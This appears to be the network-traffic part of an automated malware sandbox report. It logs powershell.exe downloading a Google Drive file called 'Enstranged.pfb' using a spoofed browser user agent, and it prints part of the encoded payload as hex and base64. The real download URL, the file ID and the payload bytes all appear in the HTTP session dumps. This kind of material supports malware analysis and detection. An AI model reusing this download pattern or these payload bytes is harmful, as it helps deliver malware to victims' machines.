            Sep 30, 2024 09:59:11.628992081 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628997087 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629024029 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629051924 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629077911 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629081011 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629087925 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629106045 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629132986 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629158974 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629184961 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629189968 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629194975 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629221916 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629224062 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629230976 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629251957 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629262924 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629287004 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629297972 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629303932 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629321098 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629333019 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629337072 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629363060 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629379034 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629384041 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629412889 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629420996 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629426003 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629466057 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629471064 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629494905 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629519939 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629524946 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629529953 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629564047 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629566908 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629571915 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629607916 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629631042 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629632950 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629638910 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629672050 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629677057 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629702091 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629718065 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629722118 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629750967 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629765987 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629770994 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629795074 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629817009 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629822016 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629844904 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629867077 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629872084 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629898071 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629918098 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629921913 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629947901 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.629966974 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.629971981 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630002022 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630009890 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630014896 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630040884 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630062103 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630064964 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630073071 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630116940 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630121946 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630126953 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630163908 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630167961 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630206108 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.630209923 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630265951 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.630326986 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.638561010 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.638587952 CEST44349705216.58.206.65192.168.2.10
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Sep 30, 2024 09:59:06.157962084 CEST | 59679 | 53 | 192.168.2.10 | 1.1.1.1
            Sep 30, 2024 09:59:06.272408009 CEST | 53 | 59679 | 1.1.1.1 | 192.168.2.10
            Sep 30, 2024 09:59:07.403326035 CEST | 54083 | 53 | 192.168.2.10 | 1.1.1.1
            Sep 30, 2024 09:59:07.410044909 CEST | 53 | 54083 | 1.1.1.1 | 192.168.2.10
            Sep 30, 2024 09:59:20.792637110 CEST | 53 | 56157 | 1.1.1.1 | 192.168.2.10
            Sep 30, 2024 09:59:23.276977062 CEST | 53 | 64718 | 1.1.1.1 | 192.168.2.10

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Sep 30, 2024 09:59:06.157962084 CEST | 192.168.2.10 | 1.1.1.1 | 0x1cba | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
            Sep 30, 2024 09:59:07.403326035 CEST | 192.168.2.10 | 1.1.1.1 | 0xc620 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Sep 30, 2024 09:59:06.272408009 CEST | 1.1.1.1 | 192.168.2.10 | 0x1cba | No error (0) | drive.google.com | - | 142.250.185.206 | A (IP address) | IN (0x0001) | false
            Sep 30, 2024 09:59:07.410044909 CEST | 1.1.1.1 | 192.168.2.10 | 0xc620 | No error (0) | drive.usercontent.google.com | - | 216.58.206.65 | A (IP address) | IN (0x0001) | false
            • drive.google.com
            • drive.usercontent.google.com
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.10 | 49704 | 142.250.185.206 | 443 | 7432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-09-30 07:59:06 UTC | 215 | OUT | GET /uc?export=download&id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Connection: Keep-Alive
            2024-09-30 07:59:07 UTC | 1610 | IN | HTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Mon, 30 Sep 2024 07:59:07 GMT
            Location: https://drive.usercontent.google.com/download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download
            Strict-Transport-Security: max-age=31536000
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Cross-Origin-Opener-Policy: same-origin
            Content-Security-Policy: script-src 'nonce-tRT13k_qHQyTGFmGbAFcsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.10 | 49705 | 216.58.206.65 | 443 | 7432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-09-30 07:59:08 UTC | 233 | OUT | GET /download?id=1zjiUYIFRKWEmAY58vp5hW7Q3TQzHAFaW&export=download HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
            2024-09-30 07:59:10 UTC | 4854 | IN | HTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Content-Security-Policy: sandbox
            Content-Security-Policy: default-src 'none'
            Content-Security-Policy: frame-ancestors 'none'
            X-Content-Security-Policy: sandbox
            Cross-Origin-Opener-Policy: same-origin
            Cross-Origin-Embedder-Policy: require-corp
            Cross-Origin-Resource-Policy: same-site
            X-Content-Type-Options: nosniff
            Content-Disposition: attachment; filename="Enstranged.pfb"
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Credentials: false
            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
            Accept-Ranges: bytes
            Content-Length: 472460
            Last-Modified: Sun, 29 Sep 2024 19:01:31 GMT
            X-GUploader-UploadID: AD-8ljvYxJBCSgBHrhIeHmZ3dZb9nJImE3x7bZrkyEIQ-FeyBPoA2Wz2YyinF2r12ts8sh9y5s_Lw2AdSQ
            Date: Mon, 30 Sep 2024 07:59:10 GMT
            Expires: Mon, 30 Sep 2024 07:59:10 GMT
            Cache-Control: private, max-age=0
            X-Goog-Hash: crc32c=+VWg4Q==
            Server: UploadServer
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close
            2024-09-30 07:59:10 UTC | 4854 | IN | Data Raw: 63 51 47 62 63 51 47 62 75 32 34 54 47 51 44 72 41 76 77 76 63 51 47 62 41 31 77 6b 42 4f 73 43 58 36 6c 78 41 5a 75 35 4e 67 4d 55 66 65 73 43 46 64 39 78 41 5a 75 42 38 61 4c 72 4e 46 48 72 41 6d 36 6a 36 77 49 43 67 59 48 78 6c 4f 67 67 4c 48 45 42 6d 2b 73 43 79 54 44 72 41 6f 74 59 63 51 47 62 75 67 59 55 79 49 58 72 41 74 72 34 63 51 47 62 63 51 47 62 36 77 49 31 4a 44 48 4b 36 77 4c 54 32 6e 45 42 6d 34 6b 55 43 2b 73 43 54 54 42 78 41 5a 76 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 63 50 75 42 2b 56 4a 2f 2f 77 46 38 7a 4f 73 43 47 45 5a 78 41 5a 75 4c 52 43 51 45 36 77 4c 55 38 58 45 42 6d 34 6e 44 36 77 4b 2f 57 65 73 43 2b 2b 75 42 77 34 32 63 4f 51 42 78 41 5a 76 72 41 76 67 51 75 67 6c 71 41 38 58 72 41 71 37 46 36 77 4c
            Data Ascii: cQGbcQGbu24TGQDrAvwvcQGbA1wkBOsCX6lxAZu5NgMUfesCFd9xAZuB8aLrNFHrAm6j6wICgYHxlOggLHEBm+sCyTDrAotYcQGbugYUyIXrAtr4cQGbcQGb6wI1JDHK6wLT2nEBm4kUC+sCTTBxAZvR4nEBm3EBm4PBBHEBm+sCcPuB+VJ//wF8zOsCGEZxAZuLRCQE6wLU8XEBm4nD6wK/WesC++uBw42cOQBxAZvrAvgQuglqA8XrAq7F6wL
            2024-09-30 07:59:10 UTC | 4854 | IN | Data Raw: 32 72 30 31 37 4e 51 6e 37 4b 59 73 6b 46 66 46 4a 32 6a 6b 49 65 61 64 6b 33 41 67 32 44 76 70 65 48 73 4e 46 72 6e 6c 38 33 50 38 4c 59 35 50 56 50 6f 63 56 4b 36 7a 4e 63 31 4c 74 42 6d 72 76 6f 30 6f 4c 49 7a 43 4b 61 61 75 70 35 53 37 6b 36 4a 41 51 44 58 79 33 36 78 50 43 76 62 6d 71 4d 41 46 58 51 72 59 39 72 46 72 68 4f 72 33 62 63 41 46 57 2f 76 49 37 62 78 64 63 49 58 4a 5a 52 48 44 74 46 4e 4a 2b 34 58 71 79 55 6a 7a 39 54 61 69 4a 39 7a 51 38 61 75 4a 77 62 44 50 50 4e 38 39 79 41 32 79 49 36 54 63 41 67 50 2f 78 43 63 42 61 2b 38 2f 4c 34 62 68 4d 64 67 2b 38 74 32 30 6f 53 67 64 73 37 54 68 41 41 54 42 5a 30 41 5a 64 62 6a 78 59 73 4c 72 73 6b 36 4e 53 77 4e 35 30 70 77 6b 5a 5a 56 64 4e 6c 6c 4b 69 65 45 2b 57 66 37 46 30 6a 67 42 45 78 70
            Data Ascii: 2r017NQn7KYskFfFJ2jkIeadk3Ag2DvpeHsNFrnl83P8LY5PVPocVK6zNc1LtBmrvo0oLIzCKaaup5S7k6JAQDXy36xPCvbmqMAFXQrY9rFrhOr3bcAFW/vI7bxdcIXJZRHDtFNJ+4XqyUjz9TaiJ9zQ8auJwbDPPN89yA2yI6TcAgP/xCcBa+8/L4bhMdg+8t20oSgds7ThAATBZ0AZdbjxYsLrsk6NSwN50pwkZZVdNllKieE+Wf7F0jgBExp
            2024-09-30 07:59:10 UTC | 135 | IN | Data Raw: 65 37 72 44 70 42 30 64 4e 33 46 4b 6c 79 50 78 63 6e 66 49 6b 39 6a 78 64 63 64 77 68 59 70 74 47 71 70 52 47 56 6d 77 49 46 4f 67 4e 43 36 2f 72 2b 76 4e 52 36 2b 58 49 56 4a 46 59 33 46 6e 57 6d 43 56 58 69 52 62 59 32 77 6d 56 63 78 6e 7a 6b 72 67 46 37 49 7a 35 4c 70 35 68 72 36 4b 66 6f 6a 36 39 42 32 45 67 34 73 48 33 4f 34 63 7a 73 61 38 6c 30 74 4e 73 32 34 4c 6e 57 39 6b 77 6b 4f 58 71 4c 34
            Data Ascii: e7rDpB0dN3FKlyPxcnfIk9jxdcdwhYptGqpRGVmwIFOgNC6/r+vNR6+XIVJFY3FnWmCVXiRbY2wmVcxnzkrgF7Iz5Lp5hr6Kfoj69B2Eg4sH3O4czsa8l0tNs24LnW9kwkOXqL4
            2024-09-30 07:59:10 UTC | 1324 | IN | Data Raw: 63 56 6e 2f 43 51 43 38 74 47 61 65 58 78 75 31 6a 4a 61 48 32 58 37 59 34 36 70 52 44 65 42 73 35 72 78 7a 4c 4d 4a 50 6a 76 76 74 32 75 76 62 43 75 33 37 43 67 56 6e 57 61 4e 64 55 34 71 69 56 30 35 35 54 46 50 55 64 39 6d 73 75 4a 4e 57 57 52 71 57 70 61 44 49 46 51 55 78 30 41 6e 68 77 2f 34 43 43 33 54 73 64 66 2f 35 70 48 55 69 7a 32 73 2b 30 4e 50 36 57 53 34 46 57 62 49 71 46 76 73 62 79 35 53 73 59 54 41 42 58 4c 39 38 4c 53 42 61 36 37 4f 31 47 56 51 42 50 52 64 52 47 31 68 61 4b 62 49 70 37 30 39 63 69 48 71 32 49 73 41 70 79 58 38 75 30 33 2b 36 2b 2f 73 6e 34 4a 7a 71 73 30 63 70 5a 4f 51 59 30 49 5a 58 71 4c 57 35 6a 6d 4a 71 74 53 4b 6c 36 4f 30 66 76 58 6d 44 70 46 64 50 37 68 45 4d 68 72 34 6a 66 50 6d 6a 4e 32 44 58 51 54 77 67 37 2b 30
            Data Ascii: cVn/CQC8tGaeXxu1jJaH2X7Y46pRDeBs5rxzLMJPjvvt2uvbCu37CgVnWaNdU4qiV055TFPUd9msuJNWWRqWpaDIFQUx0Anhw/4CC3Tsdf/5pHUiz2s+0NP6WS4FWbIqFvsby5SsYTABXL98LSBa67O1GVQBPRdRG1haKbIp709ciHq2IsApyX8u03+6+/sn4Jzqs0cpZOQY0IZXqLW5jmJqtSKl6O0fvXmDpFdP7hEMhr4jfPmjN2DXQTwg7+0
            2024-09-30 07:59:10 UTC | 1390 | IN | Data Raw: 2b 65 2b 66 50 4c 46 6a 70 50 69 57 6b 79 66 43 68 50 4c 44 59 61 33 51 64 50 30 5a 56 71 6b 55 2f 59 5a 49 64 63 6a 33 4b 62 2b 4f 57 5a 75 38 33 71 54 4e 55 4d 71 37 73 55 4e 57 4e 72 52 6b 54 34 79 46 70 67 35 79 45 37 7a 78 38 67 51 42 75 4e 69 6a 4a 42 77 38 7a 51 4e 52 69 41 34 6d 77 32 65 6a 32 51 38 38 51 33 2b 6b 6f 6f 46 76 4c 46 4d 70 32 71 67 39 6a 55 44 39 67 33 38 7a 6c 73 38 70 32 4a 52 6e 34 75 6a 39 67 75 77 45 4c 32 68 30 64 4e 33 46 4b 76 79 50 78 7a 6b 44 45 6e 59 56 76 36 6d 6a 74 39 46 61 71 64 52 37 37 6f 35 62 78 63 37 69 69 32 7a 52 2b 52 4f 49 6f 59 75 42 47 30 59 5a 4f 4f 6b 70 75 55 58 74 56 45 48 57 35 51 4d 6c 79 51 75 48 48 75 49 35 35 70 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34
            Data Ascii: +e+fPLFjpPiWkyfChPLDYa3QdP0ZVqkU/YZIdcj3Kb+OWZu83qTNUMq7sUNWNrRkT4yFpg5yE7zx8gQBuNijJBw8zQNRiA4mw2ej2Q88Q3+kooFvLFMp2qg9jUD9g38zls8p2JRn4uj9guwEL2h0dN3FKvyPxzkDEnYVv6mjt9FaqdR77o5bxc7ii2zR+ROIoYuBG0YZOOkpuUXtVEHW5QMlyQuHHuI55p0uBvpdLgb6XS4G+l0uBvpdLgb6XS4
            2024-09-30 07:59:11 UTC | 1390 | IN | Data Raw: 77 4d 33 38 41 30 58 37 71 73 75 77 6a 68 75 63 73 57 7a 46 5a 73 79 64 5a 32 37 6a 64 51 57 44 4b 55 51 5a 67 51 77 63 77 53 4e 78 70 49 6b 61 4f 6f 76 64 78 33 5a 4e 51 70 6a 67 4c 36 58 48 54 39 41 71 56 71 4a 50 32 48 4c 54 64 4c 37 79 6d 39 53 67 4e 5a 31 50 32 47 42 53 44 30 36 79 6b 63 72 32 39 61 38 4e 34 6d 78 66 6f 43 39 76 30 31 49 58 6c 5a 4a 74 78 34 58 72 30 35 63 6e 51 7a 76 37 33 46 68 33 66 6c 6a 6e 46 34 76 36 4c 6a 45 65 75 63 6e 67 66 55 47 63 7a 34 31 36 69 46 71 61 76 4b 4d 6d 51 33 76 33 7a 66 50 54 6f 36 2b 68 37 6d 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 55 34 7a 31 43 69 57 6f 75 47 54 6d 74 61 75 78 6c 70 51 43 49 32 38 6c 30 75 42 37 69 39 4b 7a 33 49 69
            Data Ascii: wM38A0X7qsuwjhucsWzFZsydZ27jdQWDKUQZgQwcwSNxpIkaOovdx3ZNQpjgL6XHT9AqVqJP2HLTdL7ym9SgNZ1P2GBSD06ykcr29a8N4mxfoC9v01IXlZJtx4Xr05cnQzv73Fh3fljnF4v6LjEeucngfUGcz416iFqavKMmQ3v3zfPTo6+h7mBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvpdLgU4z1CiWouGTmtauxlpQCI28l0uB7i9Kz3Ii
            2024-09-30 07:59:11 UTC | 1390 | IN | Data Raw: 65 53 68 77 37 51 44 47 72 31 79 52 5a 6b 67 51 77 67 65 4a 4d 52 62 75 75 78 68 47 68 35 2f 68 68 43 2f 4c 73 61 32 4f 51 6d 54 45 52 34 31 53 33 6e 58 4a 55 58 59 41 59 4f 65 50 43 4d 30 2b 70 4d 4c 6c 52 7a 68 6b 37 2b 44 35 61 6a 6a 31 74 52 6f 34 77 68 50 32 46 76 73 30 54 41 48 33 51 45 48 77 4c 78 2f 4e 33 39 55 53 5a 68 4d 7a 45 57 62 6d 4c 72 44 66 53 76 61 4a 6e 62 4c 34 79 54 67 42 4d 33 68 6a 58 49 68 36 74 67 4c 67 4b 63 30 6a 4f 73 7a 32 41 7a 78 78 71 35 6e 45 43 34 63 76 34 46 51 6b 47 49 6f 75 4f 65 62 74 69 6b 4b 79 33 47 52 6f 76 33 7a 31 6c 66 4e 31 69 57 42 35 2b 70 59 71 55 64 44 6a 2b 35 34 64 64 46 58 64 35 66 52 50 58 41 4e 68 73 30 65 41 57 70 53 6d 6a 50 68 63 41 65 4d 36 38 32 55 44 46 31 77 68 63 6c 6e 6b 63 32 4b 36 49 39 71
            Data Ascii: eShw7QDGr1yRZkgQwgeJMRbuuxhGh5/hhC/Lsa2OQmTER41S3nXJUXYAYOePCM0+pMLlRzhk7+D5ajj1tRo4whP2Fvs0TAH3QEHwLx/N39USZhMzEWbmLrDfSvaJnbL4yTgBM3hjXIh6tgLgKc0jOsz2Azxxq5nEC4cv4FQkGIouOebtikKy3GRov3z1lfN1iWB5+pYqUdDj+54ddFXd5fRPXANhs0eAWpSmjPhcAeM682UDF1whclnkc2K6I9q
            2024-09-30 07:59:11 UTC | 1390 | IN | Data Raw: 64 69 59 6a 4c 4b 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 6e 69 4e 68 33 69 5a 65 71 76 33 6c 66 42 51 31 36 66 45 2b 37 45 63 78 67 57 2b 6c 30 73 37 4c 68 72 61 58 62 47 58 6c 55 71 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 6d 39 54 57 57 41 38 6f 38 72 44 6b 30 76 51 42 31 35 34 6a 77 30 57 75 72 6d 67 75 44 34 41 66 78 38 41 4a 61 6f 57 75 6a 35 6c 55 70 45 49 76 78 6d 4d 51 79 34 6d 46 6b 34 32 62 54 47 65 4d 59 6d 48 30 57 41 7a 34 47 69 51 33 57 65 73 78 63 7a 7a 32 47 48 72 73 47 31 50 69 63 2f 74 43 65 45 48 71 6f 51 4c 74 4d 52 2f 77 52 4a 6f 55 70 4a 4c 67 65 58 78 52 45 61 4e 6c 30 75 42 76 70 64 4c
            Data Ascii: diYjLK+l0uBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvniNh3iZeqv3lfBQ16fE+7EcxgW+l0s7LhraXbGXlUq+l0uBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvm9TWWA8o8rDk0vQB154jw0WurmguD4Afx8AJaoWuj5lUpEIvxmMQy4mFk42bTGeMYmH0WAz4GiQ3Wesxczz2GHrsG1Pic/tCeEHqoQLtMR/wRJoUpJLgeXxREaNl0uBvpdL
            2024-09-30 07:59:11 UTC | 1390 | IN | Data Raw: 62 36 30 6e 4c 43 47 6d 74 6e 2f 76 56 35 61 4b 68 62 65 50 6c 52 49 43 67 46 6b 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 62 77 49 50 6b 2b 2b 6e 75 38 4a 6e 4e 36 58 62 51 4d 68 6f 75 49 35 35 70 6b 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 67 62 36 58 53 34 47 2b 6c 30 75 42 76 70 64 4c 64 34 48 4b 67 61 61 5a 6e 6b 35 5a 56 63 58 61 30 67 57 47 48 38 64 31 46 6f 69 38 36 65 46 34 41 45 30 67 50 49 6e 7a 46 71 44 33 51 79 54 34 43 4c 33 57 68 73 75 39 69 37 4a 37 65 64 58 6f 53 4e 74 68 52 5a 75 6d 6c 58 61 65 56 78 6b 73 33 36 79 53 35 51 72 75 5a 46 50 4a 54 72 6f 59 41 68 2b 4e 53 71 61 53 6c 6e 64 36 4c 63 77 62 31 77 44 72 37 73 30 78 46 71 57 39 78 59
            Data Ascii: b60nLCGmtn/vV5aKhbePlRICgFkuBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvpdLbwIPk++nu8JnN6XbQMhouI55pkuBvpdLgb6XS4G+l0uBvpdLgb6XS4G+l0uBvpdLd4HKgaaZnk5ZVcXa0gWGH8d1Foi86eF4AE0gPInzFqD3QyT4CL3Whsu9i7J7edXoSNthRZumlXaeVxks36yS5QruZFPJTroYAh+NSqaSlnd6Lcwb1wDr7s0xFqW9xY
            2024-09-30 07:59:11 UTC | 1390 | IN | Data Raw: 68 61 39 64 43 66 35 65 67 42 51 6d 74 35 39 63 78 61 39 53 30 56 78 6b 4e 45 69 48 71 75 49 6a 67 70 7a 55 38 75 33 75 43 4e 6c 58 44 64 47 6b 68 76 71 6a 65 56 76 79 6d 68 53 64 61 68 41 65 4e 68 72 33 4d 65 66 53 34 7a 74 66 6e 73 72 5a 32 4b 47 55 34 34 6e 52 63 2b 77 4f 4d 71 38 59 44 6d 35 31 65 59 54 70 64 38 33 78 30 2f 57 41 59 34 6c 64 69 55 57 76 48 51 38 41 48 4d 41 55 58 75 67 34 52 33 46 31 77 68 63 6e 6e 45 63 4f 6b 55 77 68 58 43 4a 35 31 48 6f 78 76 4a 4b 46 44 57 74 57 37 45 36 4f 68 74 75 58 51 36 44 36 4b 2b 38 56 50 65 61 70 69 33 70 7a 72 52 34 4b 30 6e 63 4a 70 38 54 70 39 73 2b 61 32 76 65 36 43 6e 65 2f 64 2b 6b 79 6d 39 67 44 49 7a 53 50 33 6c 71 55 43 64 49 77 6f 2b 39 62 76 6e 55 6a 69 75 75 6e 39 2f 52 32 67 68 54 74 78 4e 6d
